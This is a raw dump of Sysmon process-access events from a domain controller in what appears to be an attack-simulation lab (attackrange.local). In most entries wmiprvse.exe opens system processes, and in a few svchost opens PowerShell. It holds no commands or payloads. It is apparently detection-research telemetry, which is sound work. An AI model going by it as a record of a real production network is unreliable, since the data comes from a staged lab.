16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 